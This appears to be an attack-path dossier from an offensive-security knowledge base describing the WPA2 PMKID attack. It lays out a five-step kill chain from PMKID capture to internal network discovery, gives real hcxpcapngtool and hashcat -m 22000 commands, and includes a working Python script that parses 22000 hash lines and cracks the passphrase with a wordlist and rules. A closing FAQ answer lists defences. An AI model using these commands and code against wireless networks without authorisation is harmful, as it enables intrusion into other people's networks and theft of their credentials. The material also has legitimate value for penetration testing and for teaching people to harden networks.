Dossier · 5 steps · 4 edges

PMKID attack → offline crack with no client interaction

In WPA2-Personal the AP sends a PMKID in the RSN IE of the first EAPOL message of the 4-way handshake, so a single association attempt by the attacker's own station yields it; no legitimate client has to be present or deauthenticated. The PMKID is HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA), and everything in it except the PMK is in the capture, so hcxdumptool plus hashcat -m 22000 recover the PSK offline if the passphrase is weak.

Filed by AD Knowledge Base

§ Context

Assumed environment: the target WPA2-Personal AP includes a PMKID in EAPOL message 1 after association. Not every AP does; it is common on APs with PMK caching or 802.11r fast roaming enabled, and the technique has been public since the hashcat team's August 2018 disclosure. No connected clients are required, so the capture works against an empty network (useful for out-of-hours assessments); the PSK is recovered only if it is weak enough to fall to a wordlist-plus-rules attack.

§ Steps

In execution order:

  01  hcxdumptool: capture PMKIDs
      Credential Access · WIFI-PMKID WPA2 PMKID Attack
  02  hcxtools: convert the capture to hashcat 22000 format
      Execution · T1059 Command and Scripting Interpreter
  03  hashcat -m 22000 with wordlist + rules
      Credential Access · T1110 Brute Force
  04  Connect to WLAN with the recovered PSK
      Initial Access · T1078 Valid Accounts
  05  Continue internal foothold chain
      Discovery · N-NMAP-INTERNAL Internal Nmap Sweep
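The conversion and crack steps above hide what is actually inside a 22000 line and why it is crackable with no client present. The following is an added example written for this dossier, not code from hcxtools or hashcat: it derives a PMKID the way the AP does, emits it as a hashcat 22000 PMKID line (WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***), and runs a small wordlist-plus-rules crack against it. The ESSID, MAC addresses, passphrase and wordlist are constructed for the demo; the rule set is a toy subset of hashcat's. On a real engagement the equivalent commands are hcxpcapngtool -o hash.22000 capture.pcapng followed by hashcat -m 22000 hash.22000 wordlist.txt -r rules/best64.rule (hcxdumptool's own capture flags differ between releases, so check its --help).

```python
import hashlib
import hmac
from typing import Iterable, Iterator, Optional, Tuple

# --- WPA2-Personal key derivation (IEEE 802.11-2016, 12.7.1.3) ---

def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA).

    The AP sends this in EAPOL message 1. MACs and ESSID are in the capture,
    so the only unknown is the PMK, i.e. the passphrase: an offline crack."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


# --- hashcat 22000 line handling (PMKID lines carry TYPE 01; EAPOL lines use 02) ---

def make_22000_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: str) -> str:
    """WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex*** (ANONCE/EAPOL/MESSAGEPAIR empty)."""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid.hex(), mac_ap.hex(), mac_sta.hex(), essid.encode().hex())


def parse_22000_line(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Split a PMKID line back into (pmkid, mac_ap, mac_sta, essid)."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a WPA*01 (PMKID) line: %r" % line)
    return (bytes.fromhex(fields[2]), bytes.fromhex(fields[3]),
            bytes.fromhex(fields[4]), bytes.fromhex(fields[5]).decode())


# --- "wordlist + rules": a toy subset of hashcat rule semantics (':', 'c', '$1', '$!', '$123') ---

def apply_rules(word: str) -> Iterator[str]:
    """Yield the base word and a few mutations users commonly apply to it."""
    yield word
    yield word.capitalize()
    for suffix in ("1", "!", "123"):
        yield word + suffix
        yield word.capitalize() + suffix


def crack_pmkid(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the passphrase that reproduces the captured PMKID, or None.

    Each candidate costs one PBKDF2 (4096 HMAC-SHA1 rounds); hashcat does the
    same work on GPU, which is why only weak passphrases fall."""
    pmkid, mac_ap, mac_sta, essid = parse_22000_line(line)
    for word in wordlist:
        for cand in apply_rules(word):
            if not 8 <= len(cand) <= 63:  # WPA passphrase length bounds
                continue
            guess = derive_pmkid(derive_pmk(cand, essid), mac_ap, mac_sta)
            if hmac.compare_digest(guess, pmkid):
                return cand
    return None


# --- Constructed sample (not a real capture): AP 00:11:22:33:44:55, STA 66:77:88:99:aa:bb ---
ESSID = "CorpGuest"                       # hypothetical network
MAC_AP = bytes.fromhex("001122334455")    # hypothetical AP BSSID
MAC_STA = bytes.fromhex("66778899aabb")   # the attacker's own station MAC
WEAK_PSK = "Welcome123"                   # the kind of PSK this attack recovers
SAMPLE_LINE = make_22000_line(
    derive_pmkid(derive_pmk(WEAK_PSK, ESSID), MAC_AP, MAC_STA), MAC_AP, MAC_STA, ESSID)
WORDLIST = ["password", "welcome", "corpguest", "summer"]  # constructed wordlist

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", crack_pmkid(SAMPLE_LINE, WORDLIST))
```

The length filter matters: candidates shorter than 8 or longer than 63 characters can never be a valid WPA passphrase, so they are skipped before the expensive PBKDF2. A 20-character random PSK is outside any wordlist-plus-rules search, which is the whole reason the context note says "if it's weak".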

§ References

MITRE ATT&CK T1078 Valid Accounts: https://attack.mitre.org/techniques/T1078/
MITRE ATT&CK T1059 Command and Scripting Interpreter: https://attack.mitre.org/techniques/T1059/
MITRE ATT&CK T1110 Brute Force: https://attack.mitre.org/techniques/T1110/
hcxdumptool: https://github.com/ZerBea/hcxdumptool
hcxtools (hcxpcapngtool): https://github.com/ZerBea/hcxtools
hashcat forum, "New attack on WPA/WPA2 using PMKID" (August 2018): https://hashcat.net/forum/thread-7717.html

§ Frequently asked

What is the "PMKID attack → offline crack with no client interaction" attack path?
The AP sends a PMKID in the first EAPOL message of the WPA2 4-way handshake, so one association attempt by the attacker's own station is enough to obtain it; no legitimate client has to be present or deauthenticated. hcxdumptool captures it, hcxtools converts it to hashcat's 22000 format, and hashcat -m 22000 recovers the PSK offline if it is weak. The path chains 5 steps drawn from real-world offensive-security techniques.
What starting position does this attack require?
Only radio range of the target AP. The chain opens with hcxdumptool capturing PMKIDs (WIFI-PMKID, Credential Access); the Connect to WLAN step (T1078, an initial-access primitive) comes later and uses the recovered PSK. Assumed environment: the target WPA2-Personal AP includes a PMKID in EAPOL message 1, which is common on APs with PMK caching or 802.11r enabled.
What is the final impact of this kill-chain?
The chain ends at Continue internal foothold chain (N-NMAP-INTERNAL, Discovery): with the cracked PSK the operator joins the WLAN and sweeps the internal network, then pivots into post-exploitation or persistence. The capture and crack steps (WIFI-PMKID, T1110) are the Credential Access primitives that make that foothold possible.
How can defenders detect or prevent this attack?
Detection and prevention vary per step; the MITRE ATT&CK entries listed under "References" give the controls, telemetry and known threat-actor usage for T1078, T1059 and T1110. For the PMKID step itself: use a long random PSK (the offline crack only succeeds against weak passphrases), or move to WPA2-Enterprise (802.1X, no shared PSK) or WPA3-SAE, whose handshake does not expose offline-crackable material; where the AP firmware allows, disable PMK caching or 802.11r if roaming is not needed. On the detection side, a WIDS can flag repeated association attempts from unknown station MACs and the deauthentication bursts hcxdumptool may emit.
